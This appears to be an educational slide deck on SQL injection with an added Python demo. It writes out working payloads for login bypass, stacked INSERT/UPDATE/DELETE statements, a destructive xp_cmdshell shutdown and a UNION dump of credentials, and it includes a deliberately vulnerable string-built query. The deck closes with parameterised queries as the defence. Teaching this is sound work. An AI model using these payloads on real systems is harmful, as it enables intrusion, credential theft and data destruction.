SQL Injections
Attacks on data management
Daniel Schosser
Sept. 2012
What is SQL?
What can we use SQL for?
What do SQL statements look like?
SELECT * FROM users WHERE name="________" AND password="________";--
Where do people use SQL?
Where are SQL injections possible?
Example SQL-Statement for a login-form
SELECT * FROM users WHERE name="________" AND password="________";--
Example: the same login form, injecting into the username field
Username: John";--
SELECT * FROM users WHERE name="John";--" AND password="________";
Everything after -- is a comment, so the password check is never evaluated.
Insert unauthorized data
Username: not important
Password: foobar"; INSERT INTO users (name, password, email) VALUES ("anonymous", "secret", "anonymous@example.com")
SELECT * FROM users WHERE name="not important" AND password="foobar"; INSERT INTO users (name, password, email) VALUES ("anonymous", "secret", "anonymous@example.com")";--
This only works if the database driver executes stacked statements (several statements in one call). Single-statement APIs reject the string; batch APIs run the INSERT.
Bypass authentication
Username: "John"
Password: foobar" OR 1=1;--
SELECT * FROM users WHERE name="John" AND password="foobar" OR 1=1;--";--
AND binds tighter than OR, so the condition is true for every row. The application typically logs the attacker in as the first user returned.
Data manipulation
Username: "John"
Password: foobar"; UPDATE users SET password="helloWorld
SELECT * FROM users WHERE name="John" AND password="foobar"; UPDATE users SET password="helloWorld";--
The injected UPDATE has no WHERE clause: every user's password becomes helloWorld.
Delete data
Username: "John"
Password: foobar"; DELETE FROM users WHERE level="admin
SELECT * FROM users WHERE name="John" AND password="foobar"; DELETE FROM users WHERE level="admin";--
Microsoft SQL Server only: foobar"; EXEC xp_cmdshell 'shutdown /s';--
xp_cmdshell runs an operating-system command with the privileges of the database service; it is disabled by default since SQL Server 2005.
Robert"); DROP TABLE Students;-- (xkcd 327, "Exploits of a Mom")
Gathering information
SELECT * FROM users WHERE 1=1
Problem:
The attacker wants the username, e-mail address and password of every user, but the injectable query is a different one (here a book search) with three differently named columns. A UNION SELECT can append rows to that query as long as it returns the same number of columns with compatible types; they are then displayed under the original column headers.
We search for books:
2010

| title | price | published |
|---|---|---|
| SQL Injection | $29 | 2010 |
| Ethical Hacking | $26.99 | 2010 |

We search for books:
2010" UNION SELECT username, password, email FROM user#

The injected string completes the WHERE clause of the original query, appends the user table with the same number of columns, and the MySQL line comment `#` swallows the closing quote. UNION gives no ordering guarantee, so the user rows appear interleaved with the books:

| title | price | published |
|---|---|---|
| Administrator | secretPassword | admin@foobar.com |
| Developer | youWillNeverGuess | developer@foobar.com |
| SQL Injection | $29 | 2010 |
| Support | easyPassword | support@foobar.com |
| Ethical Hacking | $26.99 | 2010 |
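The book-search UNION attack above, including the column-count problem, against an in-memory SQLite database. This is an added example, not part of the original slides. It assumes constructed books and users tables modelled on the slides' tables, uses single quotes and `--` (SQLite has no `#` comment) in place of the slides' MySQL syntax, and uses Python's sqlite3 module as the application's driver.

```python
import sqlite3

# Constructed sample data, modelled on the slides' tables (not real accounts).
BOOKS = [
    ("SQL Injection", "$29", "2010"),
    ("Ethical Hacking", "$26.99", "2010"),
    ("Some Other Book", "$15", "2009"),
]
USERS = [
    ("Administrator", "secretPassword", "admin@foobar.com"),
    ("Developer", "youWillNeverGuess", "developer@foobar.com"),
    ("Support", "easyPassword", "support@foobar.com"),
]


def fresh_db():
    """In-memory SQLite database with the two tables the attack joins."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE books (title TEXT, price TEXT, published TEXT)")
    con.execute("CREATE TABLE users (username TEXT, password TEXT, email TEXT)")
    con.executemany("INSERT INTO books VALUES (?, ?, ?)", BOOKS)
    con.executemany("INSERT INTO users VALUES (?, ?, ?)", USERS)
    return con


def vulnerable_search(con, year):
    """The book search as the slides imply it: the form value is pasted into
    the WHERE clause. Rows are sorted because UNION guarantees no order."""
    sql = f"SELECT title, price, published FROM books WHERE published='{year}'"
    return sorted(con.execute(sql).fetchall())


def safe_search(con, year):
    """Parameterised version: the whole payload is compared as a literal
    value of the published column and matches nothing."""
    sql = "SELECT title, price, published FROM books WHERE published=?"
    return sorted(con.execute(sql, (year,)).fetchall())


def try_search(con, term):
    """Return the rows, or the database's error text, which is exactly what
    an attacker reads to find the right number of UNION columns."""
    try:
        return vulnerable_search(con, term)
    except sqlite3.OperationalError as exc:
        return str(exc)


def demo():
    """Normal search, a UNION with too few columns, the working dump, and
    the same dump payload against the parameterised query."""
    con = fresh_db()
    two_columns = "2010' UNION SELECT username, password FROM users--"
    three_columns = "2010' UNION SELECT username, password, email FROM users--"
    return {
        "normal": try_search(con, "2010"),
        "wrong_column_count": try_search(con, two_columns),
        "dump": try_search(con, three_columns),
        "safe": safe_search(con, three_columns),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The two-column payload fails with the database's own complaint about mismatched result columns; an attacker adjusts the payload until that error disappears, which is why verbose database errors shown to users are part of the problem. With three columns the user rows come back under the title/price/published headers, exactly as in the table above.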
Solution: parameterised queries (here with a Zend_Db-style Select object)

```php
// The ? placeholder is filled in by the database adapter, which quotes the
// value; $uid is never concatenated into the SQL string by hand.
public function fetchAllByUserId( $uid )
{
    return $this->fetchAllAbstract(
        $this->getBaseSelect()
             ->where( "users.id = ?", $uid )
    );
}
```
All input is evil, until proven otherwise!